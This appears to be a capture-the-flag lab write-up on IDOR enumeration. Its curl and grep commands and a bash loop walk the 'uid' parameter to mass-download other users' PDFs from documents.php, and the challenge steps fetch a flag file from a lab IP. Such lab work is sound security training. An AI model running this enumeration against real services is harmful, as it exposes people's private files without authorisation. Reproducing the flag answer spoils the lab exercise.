# Ctrl+U to see the source page
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>
# Then use curl
curl -s "http://SERVER_IP:PORT/documents.php?uid=1" | grep "<li class='pure-tree_link'>"
# Or just use regex to get the specific file that we need
curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?.pdf"
{% code overflow="wrap" %}
```
#!/bin/bash
url="http://SERVER_IP:PORT"
for i in {1..10}; do
for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
wget -q $url/$link
done
done
```
{% endcode %}
***
For the challenge
Intercept this page
It's a POST request
Set a payload
See the result
Verify the result
```
curl -i -X POST -d 'uid=15' http://94.237.54.116:49507/documents.php
```
Get the result
```
http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt
```
```
curl http://94.237.54.116:49507/documents/flag_11dfa168ac8eb2958e38425728623c98.txt
```
